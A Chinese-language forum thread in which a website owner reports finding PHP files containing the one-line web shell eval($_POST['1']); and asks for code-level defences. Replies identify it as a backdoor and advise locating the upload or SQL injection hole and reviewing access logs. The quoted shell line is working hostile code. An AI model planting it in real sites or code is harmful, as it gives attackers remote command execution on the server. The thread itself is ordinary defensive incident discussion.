網站多了幾個PHP檔案，eval($_POST['1']);

網站多了幾個PHP，內容如下：eval($_POST['1']);

有的是其他內容， 我百度了一下發現時執行某些命令的，我測試了一下 如果許可權沒限制好的話 確實可以執行一些命令。 請問 除了設定許可權，從代碼層級可否做限制呢？有沒有什麼好辦法呢？

還有個PHP檔案內容如下：

還有檔案，名字是：13686921256303.virus_killed
內容是：

請各位出出注意，謝謝了。

回複內容：

網站多了幾個PHP，內容如下：eval($_POST['1']);

有的是其他內容， 我百度了一下發現時執行某些命令的，我測試了一下 如果許可權沒限制好的話 確實可以執行一些命令。 請問 除了設定許可權，從代碼層級可否做限制呢？有沒有什麼好辦法呢？

還有個PHP檔案內容如下：

還有檔案，名字是：13686921256303.virus_killed
內容是：

請各位出出注意，謝謝了。

明顯的是被上傳一句話木馬了啊！ 可以通過菜刀直接連接的，可以執行很多命令。 修複的話要從根本上修複，看下網站是不是有上傳漏洞，sql注入等問題。 可以查看http的訪問日誌來看利用這個一句話執行了什麼操作，排查網站是不是被提權，擷取了伺服器許可權等。

修正要修正根上。

與其費心讓病毒代碼“不能運行”，倒不如尋找病毒進入的來源——是從PHP程式的漏洞引入的，還是從伺服器環境的不安全引入的。

另外提一下，使用虛擬機器主機在安全性上可能不是一個好主意。因為你與他人分享不隔離的物理裝置與LAMP環境，雖然理論上Linux下使用者之間的隔離很好，但實際上不隔離開還是風險很高。

這是給開了php後門了

